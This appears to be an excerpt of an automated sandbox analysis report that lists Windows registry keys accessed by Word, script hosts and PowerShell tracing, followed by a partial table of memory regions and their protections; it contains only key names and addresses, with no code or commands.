HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastSyncTimeWord

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastWriteTimeWord

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

ClockTimeSeconds

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

TickCount

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries

UpdateComplete

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851216

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328884

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090430

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457444

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033917

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328893

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328905

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851217

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328908

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328916

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033921

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457464

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998158

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM01840907

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457475

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851218

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851219

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851220

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851221

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851222

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998159

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851223

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851224

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033927

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457485

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457491

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851225

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457496

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001115

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328932

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328935

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457503

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328940

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328998

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457510

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851227

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033929

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328972

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328951

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM02835233

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328975

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328983

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328986

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851226

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033937

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328990

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457515

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090434

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property

0018C00DBAEF4114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile

MsaDevice

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents

LastPurgeTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common

SessionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\2296

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency

PotentialDataLossInfo2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 13

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 16

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 17

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 18

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 19

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 20

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0

FilePath

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0

StartDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0

EndDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\2296

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\2296

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache

LastClean

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceTicket

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328935

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851219

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328983

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851226

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328951

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328972

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328998

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328990

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851221

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328940

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851227

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998158

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328893

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090430

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851224

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457444

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328905

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851216

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM01840907

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457464

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457475

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457491

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457515

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090434

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851218

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328932

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328916

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328884

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM02835233

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328975

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328986

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851217

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851222

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328908

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457503

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457496

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851223

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851220

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851225

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001115

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457510

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033917

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033921

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033927

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998159

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457485

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033929

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033937

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

There are 269 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

1FE42949000

heap

page read and write

1290F9E9000

trusted library allocation

page read and write

2511000

trusted library allocation

page read and write

1FE428D0000

heap

page read and write

1FE42925000

heap

page read and write

1FE42B85000

heap

page read and write

2522000

trusted library allocation

page read and write

1290C7BC000

heap

page read and write

1290E241000

trusted library allocation

page read and write

1FE42905000

heap

page read and write

1290C730000

heap

page read and write

7FF847596000

trusted library allocation

page execute and read and write

7FF847700000

trusted library allocation

page read and write

2AD000

unkown

page readonly

8E5000

heap

page read and write

7FF8477E0000

trusted library allocation

page read and write

129269F7000

heap

page read and write

A803DF000

stack

page read and write

7FF847810000

trusted library allocation

page read and write

1B4EE000

stack

page read and write

7B4000

heap

page read and write

C14ED79000

stack

page read and write

129269C0000

heap

page read and write

1FE42830000

heap

page read and write

A80000

heap

page read and write

7FF8476F0000

trusted library allocation

page read and write

7FF8474CB000

trusted library allocation

page read and write

7FF848EE0000

trusted library allocation

page execute and read and write

1291E2B4000

trusted library allocation

page read and write

7FF8476B0000

trusted library allocation

page read and write

7FF847566000

trusted library allocation

page read and write

A80A78000

stack

page read and write

1B6EB000

stack

page read and write

12532000

trusted library allocation

page read and write

C14F7FE000

stack

page read and write

7FF8474D0000

trusted library allocation

page read and write

775000

heap

page read and write

A8184D000

stack

page read and write

1B6F0000

heap

page read and write

7FF8476D0000

trusted library allocation

page read and write

76D000

heap

page read and write

A80C7E000

stack

page read and write

784000

heap

page read and write

1290C77B000

heap

page read and write

C14F3FE000

stack

page read and write

74C000

heap

page read and write

1290C78F000

heap

page read and write

1B5EE000

stack

page read and write

129267E5000

heap

page read and write

1290F980000

trusted library allocation

page read and write

7FF8477A0000

trusted library allocation

page read and write

A80AFC000

stack

page read and write

1290C715000

heap

page read and write

7FF848E3D000

trusted library allocation

page execute and read and write

129267C5000

heap

page read and write

7FF847692000

trusted library allocation

page read and write

1290E130000

trusted library allocation

page read and write

12926990000

heap

page execute and read and write

1290C76F000

heap

page read and write

8D0000

trusted library allocation

page read and write

A80313000

stack

page read and write

1291E3F7000

trusted library allocation

page read and write

7FF8477C0000

trusted library allocation

page read and write

292000

unkown

page readonly

640000

heap

page read and write

740000

heap

page read and write

1290E160000

trusted library allocation

page read and write

1290F883000

trusted library allocation

page read and write

290000

unkown

page readonly

1290E170000

heap

page read and write

1290E2C4000

trusted library allocation

page read and write

9EF000

stack

page read and write

1290E140000

heap

page execute and read and write

7FF848E2D000

trusted library allocation

page execute and read and write

7FF848E32000

trusted library allocation

page read and write

C14F4FE000

stack

page read and write

12926739000

heap

page read and write

7FF847650000

trusted library allocation

page read and write

A817CB000

stack

page read and write

7FF847670000

trusted library allocation

page execute and read and write

12519000

trusted library allocation

page read and write

1292624D000

heap

page read and write

290000

unkown

page readonly

782000

heap

page read and write

1FE44760000

heap

page read and write

7FF847820000

trusted library allocation

page read and write

860000

heap

page read and write

A8067E000

stack

page read and write

840000

heap

page read and write

7FF84756C000

trusted library allocation

page execute and read and write

7FF847760000

trusted library allocation

page read and write

7AF000

heap

page read and write

A8174E000

stack

page read and write

7FF4108A0000

trusted library allocation

page execute and read and write

C14F8FE000

stack

page read and write

7FF8476E0000

trusted library allocation

page read and write

1FE42B8D000

heap

page read and write

7FF84750C000

trusted library allocation

page execute and read and write

1290E46E000

trusted library allocation

page read and write

1290C7B7000

heap

page read and write

7FF8474B4000

trusted library allocation

page read and write

12926707000

heap

page read and write

8E0000

heap

page read and write

7FF847665000

